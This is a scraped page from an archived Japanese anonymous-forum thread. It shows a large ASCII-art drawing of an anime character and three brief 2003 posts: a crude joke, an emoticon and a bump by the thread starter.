       r''":::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
        l::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::',
      l:::::::__;: -ァァ―ァ-ァ、:::;;_::::::::::::::::::::::::::::::::::::::::::::゙,
     ,.ィ‐T (..-┴':""`┴‐-!イ ̄>‐z::;_:::::::::::::::::::::::::::::'マZ>ァ、_
    ,イ_レ''"´::::::::::::::::::::::::::::::::: ̄`'┴-.、_r">、_::::::::::::::::::::::::``ヾく>z、_
  /{_/::::::::::::::::::::::::::::::::::::::::::::::::::::::_:::::::::__`ヽ.、,r'ァ、::::::::::::::::::::::::::```ヾ>‐,、
 /ゝノ::::::::::::::::::::::::::::::::::::::::::::::::i'|::;;」`ー┘`ー'''``ヽ、>,、_::::::::::::::::::::::::::;スV′
 ト、」::::::::::::::::::::::::::i!:::i : !::::::::::i'l.「   ``'‐-、_    _,.-`ヽ、`ファーrイ゙}レ'′
 「`1:::::::::::::::::::::::、トヽ:l i l.|.:i .l l:| _,,;;;;;;,_''‐ `ヽ /´_;;;;_ !::`T´`ー'-'‐''´
 F={:::::::::::::::::::::ヽヽ i::l  | l ... :K゙「:゚:::::}`ヽ  l { パ::レ,': i;/
 ,L.イ:::::::::::::::::::::i .i l l:i l| l ::.i | `゙ー'゙"´   ', i  ̄ i:l /
 ヾ_入___;::;」.l  l l::l.l:|| l:i:::l |         ',゙、 ,'::/
  `ヾ='∠ィィ='ヘ: i:l:l l::::lll:ll:l ::l |         ,. ,...'.〉 /:/
          ';:::l!:ll::::l l::ll:! l :|   、............ -ァ  /::,'  <ワロタw
           l::::::|!::ll:|:::l l i.i :!   ``二´   /:/l
          |::::l ./l!:::::l ll:l.:l`ヽ、     ,イ:l:l :!
          |:::::l/::;ハ:ヽ:l l !:::', /::``'ー┬イi::l ! :|
        _,,...L::::;;_/ ';.:i : l::!i:::',::::::::.i|::l:|:/;イ:l.il::|
      ,.r''"      ``ヾ、i l::i !::',::::::::::::リ::ハ::!l!::|


178 :スリムななし(仮)さん:03/09/20 23:55
ロビンさん、ケツ借ります。

179 :スリムななし(仮)さん:03/09/25 00:42
( *,_ゝ*)

180 :1:03/09/28 18:20
ひさびさに来たらこんなにレスが!保守



37 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)